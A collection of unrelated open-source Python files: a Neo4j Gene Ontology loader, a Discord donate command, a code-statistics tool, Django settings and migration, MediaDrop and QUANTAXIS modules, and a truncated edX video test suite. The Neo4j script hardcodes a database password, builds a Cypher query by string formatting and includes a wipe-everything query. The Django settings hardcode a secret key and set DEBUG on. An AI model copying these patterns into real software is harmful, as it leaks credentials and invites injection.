from tqdm import tqdm
from infer_effects_go import Graph, GOgraph
clear_string = '''
MATCH (n)
DETACH DELETE n
'''[1:-1]
# DOMAIN MODEL
# (:Annotation {go_id})-[:
with open('go_graph.pkl', 'rb') as fp:
go_graph = pickle.load(fp)
# with open('go_graph_neo4j_input.csv', 'w') as fp:
# print('child,relation,parent', file=fp)
# for child, parents in tqdm(go_graph._rel_table.iteritems()):
# for k, v in parents.iteritems():
# print('{0},{1},{2}'.format(child, v, k), file=fp)
class GoGraphDatabase(object):
def __init__(self, clear=False):
self._driver = GraphDatabase.driver("bolt://127.0.0.1:7687/",
auth=basic_auth("neo4j", "fffan77"))
if clear:
with self._driver.session() as session:
session.run(clear_string)
def add_term(self, go_id):
with self._driver.session() as session:
session.write_transaction(self.create_go_term_node, go_id)
def add_rel_dep(self, go_id_1, go_id_2, rel_desc = 'IS_A'):
if (not go_id_1) or (not go_id_2):
return False
with self._driver.session() as session:
session.write_transaction(self.create_go_edge, goid1=go_id_1, goid2=go_id_2, rel_desc=rel_desc)
def add_rel(self, go_id_1, go_id_2, rel_desc = 'is_a'):
querystr = ("MATCH (g1:GoTerm {go_id: $go_id_1 }), (g2:GoTerm {go_id: $go_id_2 }) "
"CREATE (g1)-[:%s]->(g2)") % rel_desc
with self._driver.session() as session:
session.run(querystr,
go_id_1=go_id_1,
go_id_2=go_id_2)
@staticmethod
def create_go_term_node(tx, go_id):
tx.run("CREATE (a:GoTerm {go_id: $go_id})", go_id=go_id)
@staticmethod
def create_go_edge(tx, goid1, goid2, rel_desc):
tx.run("MATCH (g1:GoTerm {go_id: $goid1 }), (g2:GoTerm {go_id: $goid2 }) CREATE (g1)-[:IS_A]->(g2)")
g = GoGraphDatabase(clear = True)
# first, create nodes
for k in go_graph._graph.iterkeys():
g.add_term(k)
# # now, create edges
# for k, v in go_graph._graph.iteritems():
# for x in v:
# print(k, x)
# if x and k:
# g.add_rel(go_id_1=k, go_id_2=x)
# create edges with appropriate relationship info
for k, v in go_graph._rel_table.iteritems():
for x, y in v.iteritems():
print(k, y, x)
g.add_rel(go_id_1=k, go_id_2=x, rel_desc=y)
|
JDRomano2/VenomKB
|
venomkb/archive/scripts/build_neo4j_go_database.py
|
Python
|
gpl-2.0
| 2,593
|
import discord
async def donate(cmd, message, args):
if args:
if args[0] == 'mini':
mini = True
else:
mini = False
else:
mini = False
sigma_image = 'https://i.imgur.com/mGyqMe1.png'
sigma_title = 'Sigma Donation Information'
patreon_url = 'https://www.patreon.com/ApexSigma'
paypal_url = 'https://www.paypal.me/AleksaRadovic'
support_url = 'https://discordapp.com/invite/aEUCHwX'
if mini:
response = discord.Embed(color=0x1B6F5F, title=sigma_title)
donation_text = f'Care to help out? Come support Sigma on [Patreon]({patreon_url})!'
response.description = donation_text
else:
response = discord.Embed(color=0x1B6F5F)
donation_text = 'If you could spare some money, it would be amazing of you to support my work. '
donation_text += 'At the moment support from Sigma\'s users is my only source of income. '
donation_text += f'Come check out my [Patreon]({patreon_url}) and lend a hand! You also get some goodies! '
donation_text += f'Or if a subscription is too much commitment for you, how about [PayPal]({paypal_url})? '
donation_text += f'If you do end up being one of the lovely people to give support, '
donation_text += f'drop by our [Server]({support_url}) so we can properly thank you.'
donation_text += f'\n**Thank you to the {len(cmd.bot.info.donors.donors)} donors who have provided support!**'
response.set_author(name=sigma_title, icon_url=sigma_image, url=cmd.bot.cfg.pref.website)
response.add_field(name='Care to help out?', value=donation_text)
await message.channel.send(embed=response)
|
AXAz0r/apex-sigma-core
|
sigma/modules/help/donate.py
|
Python
|
gpl-3.0
| 1,698
|
#!/usr/bin/env python
#
# $Id: get_code_stats.py 9318 2011-06-10 02:37:10Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys
import os
import re
import optparse
import math
buildscriptDir = os.path.dirname(__file__)
buildscriptDir = os.path.abspath(os.path.join(buildscriptDir, os.path.pardir))
sys.path.append(buildscriptDir)
import sandbox
import codescan
import xmail
import metadata
from ioutil import *
EXT_PAT = metadata.INTERESTING_EXT_PAT
FROM = 'Code Stat Scanner <code.scan@example.com>'
parser = optparse.OptionParser('Usage: %prog [options] [folder]\n\nCompiles stats about a code base; optionally emails report.')
xmail.addMailOptions(parser)
def getRelevantPaths(p):
relevant = []
if not p.endswith('/'):
relevant.append(p)
while p:
i = p.rfind('/')
if i == -1:
relevant.append('')
break
else:
p = p[0:i+1]
relevant.append(p)
p = p[0:-1]
return relevant
def getValuesKeyName(key):
return '[' + key + ']'
def isValuesKeyName(key):
return key[0] == '['
class StatsHolder:
def __init__(self, rootPath):
rootPath = norm_folder(rootPath)
self.rootPath = rootPath
self.statsByPath = {}
self.statsByExtension = {}
def getSandboxName(self):
i = self.rootPath.find('/sandboxes/')
if i != -1:
x = self.rootPath[i + 11:]
i = x.find('/code')
if i > -1:
x = x[0:i]
i = x.rfind('/')
if i > -1:
x = x[0:i]
return x
else:
return self.rootPath
def getRelativePath(self, path):
endsWithSlash = path.endswith('/')
path = os.path.abspath(path).replace('\\', '/')
# abspath() removes trailing slash; undo
if endsWithSlash and path[-1] != '/':
path = path + '/'
return path[len(self.rootPath):]
def addStat(self, path, statName, number):
shouldAggregate = not path.endswith('/')
if shouldAggregate:
k = getValuesKeyName(statName)
dict = self.statsByExtension
ignored, ext = os.path.splitext(path)
#print('ext = %s' % ext)
#sys.exit(0)
if not ext in dict:
dict[ext] = {}
dict = dict[ext]
if not statName in dict:
dict[statName] = number
dict[k] = [number]
else:
dict[statName] = dict[statName] + number
dict[k].append(number)
relativePath = self.getRelativePath(path)
sbp = self.statsByPath
for p in getRelevantPaths(relativePath):
if not p in sbp:
sbp[p] = {}
dict = sbp[p]
if not statName in dict:
dict[statName] = number
if shouldAggregate:
#print('aggregating %s for %s', (k, p))
dict[k] = [number]
else:
dict[statName] = dict[statName] + number
if shouldAggregate:
dict[k].append(number)
_CPP_TESTNAME_PAT = re.compile(r'^\s*(SIMPLE_TEST\s*\(\s*(.*?)\s*\)|class\s+([a-zA-Z_0-9]+)\s*:\s*(public|protected|private)\s+[a-zA-Z_0-9]+Test)', re.MULTILINE | re.DOTALL)
_JAVA_TESTNAME_PAT = re.compile(r'^\s*public\s+void\s+([a-zA-Z_0-9]+)\s*\(', re.MULTILINE | re.DOTALL)
_PY_TESTNAME_PAT = re.compile(r'^\s*def test([a-zA-Z_0-9]+)\s*\(\s*self\s*\)\s*:', re.MULTILINE | re.DOTALL)
_CPP_CLASS_PAT = re.compile(r'^\s*(template\s*<.*?>\s*)?(class|struct|union)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL)
_JAVA_CLASS_PAT = re.compile(r'^\s*((abstract|public|private|protected|static|final)\s+)*(class|interface)\s+([a-zA-Z_0-9]+)', re.MULTILINE | re.DOTALL)
_PY_CLASS_PAT = re.compile(r'^\s*class\s+([a-zA-Z_0-9]+).*?:', re.MULTILINE | re.DOTALL)
_TEST_FILE_PAT = re.compile(r'/test/', re.IGNORECASE)
_CLASS_PATS = [_CPP_CLASS_PAT, _JAVA_CLASS_PAT, _PY_CLASS_PAT]
_TESTNAME_PATS = [_CPP_TESTNAME_PAT, _JAVA_TESTNAME_PAT, _PY_TESTNAME_PAT]
def getFileTypeIndex(path):
path = path.lower()
if path.endswith('.cpp') or path.endswith('.h'):
return 0
elif path.endswith('.java'):
return 1
elif path.endswith('.py'):
return 2
return -1
def getClassPatForPath(path):
i = getFileTypeIndex(path)
if i != -1:
return _CLASS_PATS[i]
def getTestnamePatForPath(path):
i = getFileTypeIndex(path)
if i != -1:
return _TESTNAME_PATS[i]
def analyzeFile(fpath, stats):
fpath = os.path.abspath(fpath)
rel = stats.getRelativePath(fpath)
#print('analyzing %s' % rel)
txt = read_file(fpath)
byteCount = len(txt)
stats.addStat(fpath, 'byte count, impl + test', byteCount)
lineCount = codescan.getLineNumForOffset(txt, byteCount)
stats.addStat(fpath, 'line count, impl + test', lineCount)
isTest = bool(_TEST_FILE_PAT.search(fpath))
codeType = 'impl'
if isTest:
codeType = 'test'
stats.addStat(fpath, 'byte count, ' + codeType, byteCount)
stats.addStat(fpath, 'line count, ' + codeType, lineCount)
# See if we know how to do any further analysis on this file.
pat = getClassPatForPath(fpath)
if pat:
if isTest:
pat = getTestnamePatForPath(fpath)
if pat:
stats.addStat(fpath, 'unit test count', len(pat.findall(txt)))
else:
stats.addStat(fpath, 'class count', len(pat.findall(txt)))
def statPathIsFile(p):
i = p.rfind('.')
if i > -1:
return p[i+1:] in ['cpp','h','java','py']
return False
def statPathIsComponent(p):
return p == '' or (p.endswith('/') and p.find('/') == len(p) - 1)
_FLOAT_TYPE = type(0.1)
def getReportLine(key, number, showKB = False, formatSpecifier='%02f'):
numtxt = number
ntype = type(number)
if ntype == _FLOAT_TYPE:
numtxt = formatSpecifier % number
if numtxt.endswith('00'):
numtxt = numtxt[0:-3]
else:
numtxt = str(number)
line = '%s = %s' % (key, numtxt)
if showKB:
line += ' (%0.0f KB)' % (number / 1024.0)
return line
def getAggregateStats(dict, key):
values = dict.get(getValuesKeyName(key))
avg = mean(values)
stdev = stddev(values)
return avg, stdev
def describeTestRatio(ratio, multiplier = 1.0):
if ratio < 0.085 * multiplier:
lbl = 'POOR COVERAGE'
elif ratio < 0.20 * multiplier:
lbl = 'fair coverage'
elif ratio < 0.5 * multiplier:
lbl = 'good coverage'
else:
lbl = 'excellent coverage'
return '%0.2f (%s)' % (ratio, lbl)
def generateReport(stats):
#print(stats.statsByPath)
report = ''
components = [p for p in stats.statsByPath.keys() if statPathIsComponent(p)]
files = [p for p in stats.statsByPath.keys() if statPathIsFile(p)]
components.sort()
files.sort()
uberDict = stats.statsByPath['']
avg, stdev = getAggregateStats(uberDict, 'byte count, impl')
tooBigs = {'': max(avg + 2.5 * stdev, 20000)}
avg, stdev = getAggregateStats(uberDict, 'line count, impl')
tooLongs = {'': max(avg + 2.5 * stdev, 1000)}
for ext in stats.statsByExtension.keys():
dict = stats.statsByExtension[ext]
avg, stdev = getAggregateStats(dict, 'byte count, impl')
tooBigs[ext] = avg + 2.5 * stdev
avg, stdev = getAggregateStats(dict, 'line count, impl')
tooLongs[ext] = max(avg + 2.5 * stdev, 1000)
for path in components:
desc = path
if desc == '':
desc = 'entire folder tree'
report += '\nStats for %s' % desc
dict = stats.statsByPath[path]
keys = [k for k in dict.keys() if not isValuesKeyName(k)]
keys.sort()
for key in keys:
showKB = key.startswith('byte')
report += '\n ' + getReportLine(key, dict[key], showKB)
if showKB or key.startswith('line'):
values = dict[getValuesKeyName(key)]
avg = mean(values)
report += '; ' + getReportLine('mean', avg, showKB, formatSpecifier='%0.0f')
report += '; ' + getReportLine('std dev', stddev(values), False, formatSpecifier='%0.1f')
classCount = dict.get('class count', 0)
unitTestCount = dict.get('unit test count', 0)
if unitTestCount:
implLineCount = dict.get('line count, impl', 0)
testLineCount = dict.get('line count, test', 0)
if implLineCount:
ratio = describeTestRatio(testLineCount / float(implLineCount))
report += '\n ' + getReportLine('test lines per impl line', ratio)
implByteCount = dict.get('byte count, impl', 0)
testByteCount = dict.get('byte count, test', 0)
if implByteCount:
ratio = describeTestRatio(testByteCount / float(implByteCount))
report += '\n ' + getReportLine('test bytes per impl byte', ratio)
if classCount:
ratio = describeTestRatio(float(unitTestCount) / classCount, 2.5)
else:
ratio = '(undefined; no classes)'
else:
ratio = 'NO UNIT TESTS!'
report += '\n ' + getReportLine('tests per class', ratio)
if path:
myFiles = [f for f in files if f.startswith(path)]
#testFiles = [f for f in myFiles if _TEST_FILE_PAT.search(f)]
#implFiles = [f for f in myFiles if not _TEST_FILE_PAT.search(f)]
tooComplex = []
for implF in myFiles:
ignored, ext = os.path.splitext(implF)
size = stats.statsByPath[implF].get('byte count, impl')
length = stats.statsByPath[implF].get('line count, impl')
if size > tooBigs[''] or size > tooBigs[ext] or length > tooLongs[''] or length > tooLongs[ext]:
tooComplex.append((implF, size, length))
if tooComplex:
# Java doesn't support partial classes, so splitting classes into multiple
# files isn't always practical. In C++ and python, however, there are good
# ways to split into smaller files.
if tooComplex[0][0].endswith('.java'):
comment = 'refactor suggested'
else:
comment = 'REFACTOR NEEDED'
report += '\n unusually complex files (%s):' % comment
for tc in tooComplex:
report += '\n %s (%0.0f KB, %d lines)' % (tc[0], tc[1] / 1024.0, tc[2])
report += '\n'
return report
def sum(numbers):
n = 0
for x in numbers:
n += x
return n
def mean(numbers):
return sum(numbers) / float(len(numbers))
def variance(numbers):
avg = mean(numbers)
diffsFromMean = [n - avg for n in numbers]
squaredDfm = [n * n for n in diffsFromMean]
variance = sum(squaredDfm) / len(numbers)
return variance
def stddev(numbers):
# This is a *population* stddev, not a sample stddev.
# The difference is that we assume we have all possible
# values, not just a representative sample.
return math.sqrt(variance(numbers))
class StatsRecurser:
def __init__(self, stats):
self.stats = stats
def select(self, folder, dirs):
self.stats.addStat(folder, "scanned subdir count", len(dirs))
return dirs
class StatsVisitor:
def __init__(self, stats):
self.stats = stats
def visit(self, folder, item, relativePath):
analyzeFile(folder + item, self.stats)
self.stats.addStat(folder, "scanned file count", 1)
def analyze(path, prebuilt, options):
if not os.path.isdir(path):
sys.stderr.write('%s is not a valid folder.\n' % path)
return 1
path = norm_folder(path)
stats = StatsHolder(path)
print('\nCompiling stats for %s...' % metadata.get_friendly_name_for_path(path))
visitor = StatsVisitor(stats)
recurser = StatsRecurser(stats)
visitedFiles, visitedFolders = metadata.visit(path, visitor, recurser, excludePrograms=True)#, debug=True)
report = generateReport(stats)
print(report)
if xmail.hasDest(options):
xmail.sendmail(report, subject='code stats for %s' % metadata.get_friendly_name_for_path(path),
sender='Code Stat Scanner <code.scan@example.com>', options=options)
if __name__ == '__main__':
options, args = parser.parse_args()
prebuilt = []
if args:
folder = args[0]
else:
folder = sandbox.current.get_code_root()
exitCode = analyze(folder, prebuilt, options)
sys.exit(exitCode)
|
perfectsearch/sandman
|
code/buildscripts/codescan/get_code_stats.py
|
Python
|
mit
| 12,831
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('reformedacademy', '0006_auto_20140915_0251'),
]
operations = [
migrations.CreateModel(
name='BetaToken',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('token', models.CharField(max_length=5)),
('redeemed', models.DateTimeField(blank=True)),
('invited_by', models.ForeignKey(related_name=b'invited_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('redeemed_by', models.ForeignKey(related_name=b'redeemed_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
},
bases=(models.Model,),
),
]
|
reformedforum/reformedacademy
|
reformedacademy/migrations/0007_betatoken.py
|
Python
|
gpl-3.0
| 979
|
# This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2014 MediaDrop contributors
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
from formencode import Invalid
from formencode.validators import FancyValidator
from tw.api import JSSource
from tw.forms import FormFieldRepeater
from mediadrop.forms import ListFieldSet, TextField
from mediadrop.forms.admin.storage import StorageForm
from mediadrop.lib.i18n import N_, _
from mediadrop.plugin import events
# Sure this could be abstracted into something more reusable.
# But at this point there's no need. Refactor later if needed.
class TranslateableRTMPServerJSSource(JSSource):
def render(self, *args, **kwargs):
src = JSSource.render(self, *args, **kwargs)
return src % {'add_url': _('Add another URL')}
rtmp_server_js = TranslateableRTMPServerJSSource("""
window.addEvent('domready', function(){
var fields = $('rtmp').getElement('li');
var addButton = new Element('span', {
'class': 'add-another clickable',
'text': '%(add_url)s'
});
addButton.inject(fields, 'bottom').addEvent('click', function(){
var lastInput = addButton.getPrevious();
var fullname = lastInput.get('name');
var sepindex = fullname.indexOf('-') + 1;
var name = fullname.substr(0, sepindex);
var nextNum = fullname.substr(sepindex).toInt() + 1;
var el = new Element('input', {
'type': 'text',
'name': name + nextNum,
'class': 'textfield repeatedtextfield rtmp-server-uri'
});
el.inject(lastInput, 'after').focus();
});
});
""", location='headbottom')
class RTMPURLValidator(FancyValidator):
def _to_python(self, value, state=None):
if value.startswith('rtmp://'):
return value.rstrip('/')
raise Invalid(_('RTMP server URLs must begin with rtmp://'),
value, state)
class RemoteURLStorageForm(StorageForm):
event = events.Admin.Storage.RemoteURLStorageForm
fields = StorageForm.fields + [
ListFieldSet('rtmp',
legend=N_('RTMP Servers:'),
suppress_label=True,
children=[
# FIXME: Display errors from the RTMPURLValidator
FormFieldRepeater('known_servers',
widget=TextField(
css_classes=['textfield rtmp-server-uri'],
validator=RTMPURLValidator(),
),
suppress_label=True,
repetitions=1,
),
],
)
] + StorageForm.buttons
javascript = [rtmp_server_js]
def display(self, value, engine, **kwargs):
"""Display the form with default values from the given StorageEngine.
If the value dict is not fully populated, populate any missing entries
with the values from the given StorageEngine's
:attr:`_data <mediadrop.lib.storage.StorageEngine._data>` dict.
:param value: A (sparse) dict of values to populate the form with.
:type value: dict
:param engine: An instance of the storage engine implementation.
:type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass
"""
rtmp = value.setdefault('rtmp', {})
rtmp.setdefault('known_servers', engine._data.get('rtmp_server_uris', ()))
return StorageForm.display(self, value, engine, **kwargs)
def save_engine_params(self, engine, **kwargs):
"""Map validated field values to engine data.
Since form widgets may be nested or named differently than the keys
in the :attr:`mediadrop.lib.storage.StorageEngine._data` dict, it is
necessary to manually map field values to the data dictionary.
:type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass
:param engine: An instance of the storage engine implementation.
:param \*\*kwargs: Validated and filtered form values.
:raises formencode.Invalid: If some post-validation error is detected
in the user input. This will trigger the same error handling
behaviour as with the @validate decorator.
"""
StorageForm.save_engine_params(self, engine, **kwargs)
rtmp = kwargs.get('rtmp', {})
rtmp_servers = rtmp.get('known_servers', ())
engine._data['rtmp_server_uris'] = [x for x in rtmp_servers if x]
|
kgao/MediaDrop
|
mediadrop/forms/admin/storage/remoteurls.py
|
Python
|
gpl-3.0
| 4,730
|
"""
Django settings for dron project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^+futs*@p&z(@7n1$aj#2#0@5w^b8pwurw(6p%w164_#l1qwpp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Used to determine if we are using mock.py data or real dronekit data
MODE = "ANDROID" # MOCK, ANDROID, DRONEKIT
ALLOWED_HOSTS = [u'*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'maps.apps.MapsConfig',
'droniada.apps.DroniadaConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dron.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dron.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
bladekp/DroniadaDjangoDronekitAPP
|
app/dron/settings.py
|
Python
|
mit
| 3,284
|
#Encoding:utf-8
from QUANTAXIS.QAUtil import QA_util_log_info,QA_Setting
import datetime,time
"""
标准化输出结果,并且给QAAnalysis喂食QAQ
首先接受QASignal打包出来的标准协议
"""
def QA_backtest_standard_record_market(message,client):
#client=QA_backtest_get_client(QA_Backtest)
coll=client.quantaxis.market_history
"""
bid':{
'price':str(bid['price']),
'code':str(bid['code']),
'amount':str(bid['amount']),
'time':str(bid['time']),
'towards':str(bid['towards'])
},
market:{
'open':item['open'],
'high':item['high'],
'low':item['low'],
'close':item['close'],
'volume':item['volume'],
'code':item['code']}
"""
coll.insert({
'user':message['header']['session']['user'],
'strategy_name':message['header']['session']['strategy'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp()),
'bid':message['body']['bid'],
'market':message['body']['market']
})
def QA_backtest_standard_record_account(message,client):
coll=client.quantaxis.market_history
coll.insert({
'user':message['header']['session']['user'],
'strategy_name':message['header']['session']['strategy'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp()),
'bid_date':message['body']['bid']['time'],
'bid':message['body']['bid'],
'market':message['body']['market'],
'account':message['body']['account'],
'cookie':message['header']['coookie']
})
"""
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'cur_profit':self.cur_profit
},
'bid':update_message['bid'],
'market':update_message['market'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
"""
|
lijiabogithub/QUANTAXIS
|
QUANTAXIS/QABacktest/QABacktest_standard.py
|
Python
|
mit
| 2,816
|
# -*- coding: utf-8 -*-
"""
Acceptance tests for CMS Video Editor.
"""
from nose.plugins.attrib import attr
from .test_studio_video_module import CMSVideoBaseTest
@attr('shard_6')
class VideoEditorTest(CMSVideoBaseTest):
"""
CMS Video Editor Test Class
"""
def setUp(self):
super(VideoEditorTest, self).setUp()
def _create_video_component(self, subtitles=False):
"""
Create a video component and navigate to unit page
Arguments:
subtitles (bool): Upload subtitles or not
"""
if subtitles:
self.assets.append('subs__Szu8hVDvgc.srt.sjson')
self.navigate_to_course_unit()
def test_default_settings(self):
"""
Scenario: User can view Video metadata
Given I have created a Video component
And I edit the component
Then I see the correct video settings and default values
"""
self._create_video_component()
self.edit_component()
self.assertTrue(self.video.verify_settings())
def test_modify_video_display_name(self):
"""
Scenario: User can modify Video display name
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
Then I can modify video display name
And my video display name change is persisted on save
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Component Display Name', 'Transformers')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertTrue(self.video.verify_field_value('Component Display Name', 'Transformers'))
def test_hidden_captions(self):
"""
Scenario: Captions are hidden when "transcript display" is false
Given I have created a Video component with subtitles
And I have set "transcript display" to False
Then when I view the video it does not show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'False', 'select')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_shown_captions(self):
"""
Scenario: Captions are shown when "transcript display" is true
Given I have created a Video component with subtitles
And I have set "transcript display" to True
Then when I view the video it does show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'True', 'select')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
def test_translations_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "uk, zh" translations
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
def test_upload_large_transcript(self):
"""
Scenario: User can upload transcript file with > 1mb size
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "1mb_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('1mb_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_lines())
def test_translations_download_works_w_saving(self):
"""
Scenario: Translations downloading works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And video language menu has "uk, zh" translations
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
zh_unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_download_works_wo_saving(self):
"""
Scenario: Translations downloading works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
zh_unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_remove_works_w_saving(self):
"""
Scenario: Translations removing works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
And video language menu has "uk, zh" translations
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
Then I remove translation for "zh" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.video.remove_translation('uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
